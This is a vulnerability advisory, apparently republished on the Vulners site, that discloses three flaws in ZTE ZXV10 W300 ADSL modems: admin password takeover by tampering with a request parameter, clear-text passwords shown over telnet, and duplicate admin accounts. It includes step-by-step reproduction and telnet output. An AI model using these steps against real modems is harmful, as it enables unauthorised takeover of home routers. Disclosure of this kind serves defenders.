Vulners
Lucene search
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities | 20 Nov 201500:00 | – | zdt |
 | ZTE ADSL ZXV10 W300 Password Interception Vulnerability | 25 Aug 201700:00 | – | cnvd |
| ZTE ADSL ZXV10 W300 Information Disclosure Vulnerability (CNVD-2017-28178) | 25 Aug 201700:00 | – | cnvd |
| ZTE ADSL ZXV10 W300 Information Disclosure Vulnerability | 25 Aug 201700:00 | – | cnvd |
 | CVE-2015-7257 | 24 Aug 201720:00 | – | cve |
| CVE-2015-7258 | 24 Aug 201720:00 | – | cve |
| CVE-2015-7259 | 24 Aug 201720:00 | – | cve |
 | CVE-2015-7257 | 24 Aug 201720:00 | – | cvelist |
| CVE-2015-7258 | 24 Aug 201720:00 | – | cvelist |
| CVE-2015-7259 | 24 Aug 201720:00 | – | cvelist |
10
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn GaneshenData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Nov 2015 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 38.8
CVSS 29
EPSS0.33338